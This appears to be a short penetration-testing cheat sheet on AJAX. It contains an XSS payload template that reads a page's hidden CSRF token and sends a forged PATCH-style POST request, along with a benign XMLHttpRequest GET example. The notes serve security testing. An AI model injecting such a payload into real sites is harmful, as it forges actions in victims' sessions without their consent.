Cheat sheet and tricks for AJAX (Asynchronous JavaScript and XML). Ajax is a set of web development techniques that uses various web technologies on the client-side to create asynchronous web applications. With Ajax, web applications can send and retrieve data from a server asynchronously without interfering with the display and behaviour of the existing page.
- Read data from a web server after the page has loaded
- Update a web page without reloading the page
- Send data to a web server in the background
XSS Payload
This must be adapted to the application tested.
<script>
$.ajax({
type: "POST",
url: "/somepath",
data: "_method=patch&token=" + $('input[name="token"]').val() +"¶m1=value1¶m2=value2",
success: function (){
javascript:alert('XSS worked!')
}
});
</script>Examples
See AJAX Introduction (w3schools).
This file can be hosted on the Apache Web Server on Kali.
GET
Try it using the IDE on w3schools.
<!DOCTYPE html>
<html>
<body>
<div id="demo">
<h2>The XMLHttpRequest Object</h2>
<button type="button" onclick="loadDoc()">Change Content</button>
</div>
<script>
function loadDoc() {
const xhttp = new XMLHttpRequest();
xhttp.onload = function() {
document.getElementById("demo").innerHTML =
this.responseText;
}
xhttp.open("GET", "/");
xhttp.send();
}
</script>
</body>
</html>